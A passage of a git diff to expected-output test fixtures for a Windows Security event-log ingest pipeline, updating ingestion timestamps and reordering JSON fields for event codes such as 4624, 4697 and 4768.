"ingested": "2021-12-09T13:45:50.573813200Z", + "ingested": "2021-12-14T14:55:44.021905844Z", "code": "4904", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json index cb85f92ff19..ddc7da6dff6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json @@ -13,6 +13,7 @@ "pid": 4964, "executable": "-" }, + "@timestamp": "2020-08-19T07:56:51.579Z", "winlog": { "computer_name": "WIN-BVM4LI1L1Q6.TEST.local", "process": { @@ -46,13 +47,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4905_WindowsSrv2016.xml" - } - }, - "@timestamp": "2020-08-19T07:56:51.579Z", "ecs": { "version": "1.12.0" }, @@ -61,11 +55,17 @@ "WIN-BVM4LI1L1Q6$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4905_WindowsSrv2016.xml" + } + }, "host": { "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.772922Z", + "ingested": "2021-12-14T14:55:44.216584848Z", "code": "4905", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json index 965c931df7c..b31f1160b66 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json @@ -46,7 +46,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.972826900Z", + "ingested": "2021-12-14T14:55:44.426493932Z", "code": "4906", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json index 39289698950..6959eeb870a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json @@ -13,6 +13,7 @@ "pid": 4300, "executable": "C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.1883_none_7ed84bd822106081\\TiWorker.exe" }, + "@timestamp": "2020-08-19T07:56:17.112Z", "winlog": { "computer_name": "WIN-BVM4LI1L1Q6.TEST.local", "process": { @@ -49,13 +50,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4907_WindowsSrv2016.xml" - } - }, - "@timestamp": "2020-08-19T07:56:17.112Z", "ecs": { "version": "1.12.0" }, @@ -64,11 +58,17 @@ "WIN-BVM4LI1L1Q6$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4907_WindowsSrv2016.xml" + } + }, "host": { "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:51.090769700Z", + "ingested": "2021-12-14T14:55:44.549978299Z", "code": "4907", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json index cc400c86fe1..1d548a9a1a2 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json @@ -13,6 +13,7 @@ "pid": 496, "executable": "C:\\Windows\\System32\\lsass.exe" }, + "@timestamp": "2020-04-06T06:39:04.549Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -48,13 +49,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4673.xml" - } - }, - "@timestamp": "2020-04-06T06:39:04.549Z", "ecs": { "version": "1.12.0" }, @@ -63,11 +57,17 @@ "DC_TEST2K12$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4673.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:51.283482500Z", + "ingested": "2021-12-14T14:55:44.744026785Z", "code": "4673", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json index 2df6677e8d6..44683d34a71 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2020-04-02T14:34:08.889Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4697.xml" - } - }, - "@timestamp": "2020-04-02T14:34:08.889Z", "ecs": { "version": "1.12.0" }, @@ -59,6 +53,12 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4697.xml" + } + }, "service": { "name": "winlogbeat", "type": "Win32 Own Process" @@ -67,7 +67,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:51.472412500Z", + "ingested": "2021-12-14T14:55:44.937890239Z", "code": "4697", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json index 9f0d8dc52ac..b6710943e6f 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json @@ -77,7 +77,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:51.665278200Z", + "ingested": "2021-12-14T14:55:45.137243455Z", "code": "4768", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json index f7cfee07f33..246dfeeca65 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json @@ -76,7 +76,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:51.894330100Z", + "ingested": "2021-12-14T14:55:45.357321973Z", "code": "4769", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json index 25f40fe47fd..9b79794d544 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json @@ -71,7 +71,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:52.108288400Z", + "ingested": "2021-12-14T14:55:45.571137278Z", "code": "4770", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json index a9bd7c27946..1504465c5ab 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json @@ -73,7 +73,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:52.303560800Z", + "ingested": "2021-12-14T14:55:45.772014668Z", "code": "4771", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json index d77ad8dd952..7c9c40c02ab 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json @@ -59,7 +59,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:52.499134700Z", + "ingested": "2021-12-14T14:55:45.966638282Z", "code": "4776", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json index 1debe07b396..0a50d1966c9 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2020-04-05T16:33:32.388Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -40,17 +41,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.xml" - } - }, - "source": { - "ip": "10.100.150.9", - "domain": "EQP01777" - }, - "@timestamp": "2020-04-05T16:33:32.388Z", "ecs": { "version": "1.12.0" }, @@ -62,11 +52,21 @@ "10.100.150.9" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, + "source": { + "ip": "10.100.150.9", + "domain": "EQP01777" + }, "event": { - "ingested": "2021-12-09T13:45:52.652424900Z", + "ingested": "2021-12-14T14:55:46.117822268Z", "code": "4778", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json index 9ca3a755534..59a0a266179 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2020-04-03T10:18:01.882Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -40,17 +41,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.xml" - } - }, - "source": { - "ip": "10.100.150.17", - "domain": "EQP01777" - }, - "@timestamp": "2020-04-03T10:18:01.882Z", "ecs": { "version": "1.12.0" }, @@ -62,11 +52,21 @@ "10.100.150.17" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, + "source": { + "ip": "10.100.150.17", + "domain": "EQP01777" + }, "event": { - "ingested": "2021-12-09T13:45:52.832864500Z", + "ingested": "2021-12-14T14:55:46.295611755Z", "code": "4779", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json index 587d54b2f61..1b5e322223b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json @@ -13,6 +13,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:10:39.786Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -59,13 +60,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:39.786Z", "ecs": { "version": "1.12.0" }, @@ -75,11 +69,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021187300Z", + "ingested": "2021-12-14T14:55:46.477094863Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -111,6 +111,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:10:40.255Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -157,13 +158,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:40.255Z", "ecs": { "version": "1.12.0" }, @@ -173,11 +167,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021197900Z", + "ingested": "2021-12-14T14:55:46.477097371Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -281,7 +281,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021202700Z", + "ingested": "2021-12-14T14:55:46.477097882Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -313,6 +313,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:10:40.505Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -359,13 +360,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:40.505Z", "ecs": { "version": "1.12.0" }, @@ -375,11 +369,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021209700Z", + "ingested": "2021-12-14T14:55:46.477098278Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -411,6 +411,7 @@ "pid": 0, "executable": "-" }, + "@timestamp": "2019-03-29T21:10:40.630Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -457,13 +458,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:40.630Z", "ecs": { "version": "1.12.0" }, @@ -472,11 +466,17 @@ "ANONYMOUS LOGON" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021216800Z", + "ingested": "2021-12-14T14:55:46.477098699Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -508,6 +508,7 @@ "pid": 0, "executable": "-" }, + "@timestamp": "2019-03-29T21:10:53.661Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -554,13 +555,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:53.661Z", "ecs": { "version": "1.12.0" }, @@ -569,11 +563,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021221100Z", + "ingested": "2021-12-14T14:55:46.477099120Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -605,6 +605,7 @@ "pid": 0, "executable": "-" }, + "@timestamp": "2019-03-29T21:10:54.661Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -651,13 +652,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:54.661Z", "ecs": { "version": "1.12.0" }, @@ -666,11 +660,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021226100Z", + "ingested": "2021-12-14T14:55:46.477099558Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -702,6 +702,7 @@ "pid": 0, "executable": "-" }, + "@timestamp": "2019-03-29T21:10:55.458Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -748,13 +749,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:55.458Z", "ecs": { "version": "1.12.0" }, @@ -763,11 +757,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021232300Z", + "ingested": "2021-12-14T14:55:46.477099975Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -867,7 +867,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021237Z", + "ingested": "2021-12-14T14:55:46.477100384Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -899,6 +899,7 @@ "pid": 2812, "executable": "C:\\Windows\\System32\\winlogon.exe" }, + "@timestamp": "2019-03-29T21:13:17.521Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -945,13 +946,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:13:17.521Z", "ecs": { "version": "1.12.0" }, @@ -961,11 +955,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021241700Z", + "ingested": "2021-12-14T14:55:46.477100799Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1069,7 +1069,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021256600Z", + "ingested": "2021-12-14T14:55:46.477101201Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1101,6 +1101,7 @@ "pid": 2188, "executable": "C:\\Windows\\System32\\winlogon.exe" }, + "@timestamp": "2019-03-29T21:13:18.786Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1147,13 +1148,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:13:18.786Z", "ecs": { "version": "1.12.0" }, @@ -1163,11 +1157,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021263700Z", + "ingested": "2021-12-14T14:55:46.477101810Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1199,6 +1199,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:20:48.740Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1245,13 +1246,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:20:48.740Z", "ecs": { "version": "1.12.0" }, @@ -1261,11 +1255,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021268500Z", + "ingested": "2021-12-14T14:55:46.477102243Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1297,6 +1297,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:20:48.740Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1343,13 +1344,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:20:48.740Z", "ecs": { "version": "1.12.0" }, @@ -1359,11 +1353,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021273500Z", + "ingested": "2021-12-14T14:55:46.477102652Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1395,6 +1395,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:20:50.584Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1441,13 +1442,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:20:50.584Z", "ecs": { "version": "1.12.0" }, @@ -1457,11 +1451,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021278700Z", + "ingested": "2021-12-14T14:55:46.477103058Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1493,6 +1493,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:23:42.520Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1539,13 +1540,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:23:42.520Z", "ecs": { "version": "1.12.0" }, @@ -1555,11 +1549,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021284800Z", + "ingested": "2021-12-14T14:55:46.477103461Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1591,6 +1591,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:26:24.176Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1637,13 +1638,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:26:24.176Z", "ecs": { "version": "1.12.0" }, @@ -1653,11 +1647,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021288700Z", + "ingested": "2021-12-14T14:55:46.477103997Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1764,7 +1764,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021294600Z", + "ingested": "2021-12-14T14:55:46.477104427Z", "code": "4625", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json index c123e615d29..9983e9ae94d 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:56.799158900Z", + "ingested": "2021-12-14T14:55:50.103940746Z", "code": "4722", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:56.799168200Z", + "ingested": "2021-12-14T14:55:50.103943474Z", "code": "4722", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json index 164fe82a6de..6927aa90671 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json +++ 